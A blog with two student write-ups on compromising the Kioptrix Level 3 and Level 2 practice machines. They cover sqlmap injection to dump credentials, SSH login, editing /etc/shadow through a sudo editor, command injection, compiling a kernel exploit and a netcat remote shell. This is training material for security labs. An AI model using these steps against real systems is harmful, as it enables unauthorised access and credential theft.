Monday, November 19, 2012

Lab 6 Kioptrix Level 3

Information Gathering



service Enumeration

based on the picture on nmap, I found some open ports, such as port 22 (ssh) and 80 (http)

vulnerability Assement

here i try to inject the login form, but it not works.



so i try to go to http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid # photos
then i try to inject the id parameter


Exploit

here i use sqlmap to inject the web page.
root @ bt :/ pentest / database / sqlmap #. / sqlmap.py-u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid # photos"-p id - dbs - level = 3 - risk = 4 - threads = 8



here i found three databases.
So I will use the database gallery to see what tables are availabe.


I found seven tables, so I will dump the table dev_accounts.


Here I found loneferret password. So I try to use it for login using ssh.



It works, I successfully enter into the server.
And I also found an interesting file on this folder.



We can see, that there is a newly installed software for editing, creating, and viewing files. And use it for, please use the command 'sudo ht'. And I guess, this software is an editor.
So I try to use it to see the / etc / shadow


and I try to use change the root password with loneferret password.


And it works, I'm on root now.



Alhamdulillah ....:D

Posted by at No comments:

Saturday, November 17, 2012

Lab 5 Kioptrix Level 2



Information Gathering





Service Enumeration

based on the picture on nmap, i found some port open, such as port 22 (ssh), 80 (http), 111 (rpcbind), 443 (ssl/http), 631 (ipp), and 3306 (mysql).

Vulnerability Assement

here i try to inject the form login, and it works.


I directly redirected to Administrative web console.

Exploit

so i try to use command execution attack vector.
here i try to see the information kernel.

now, i know that the server use kernel 2.6.9, then i try to see the /etc/passwd and /etc shadow. but it not works for ;cat/etc/shadow.



then i try to search the local exploit for kernel 2.6.x after that i copy it to /var/www/





then i download it to directory /tmp on target machine and compile it.

 
 we can see that the file exploit (9545.c) has been succeded. So execute it.

but i still on apache. until here I need to find a way to get into the server and then i will execute the exploit from within the server. so i try to type netcat command for listing on port 1234.


then connecting via netcat by type nc 192.168.56.101 1234. after that, execute the exploit (rooting)



we can see that our exploitation has been succes, and i'm on root now.

Alhamdulillah.... :D
Posted by at No comments:
Subscribe to: Posts (Atom)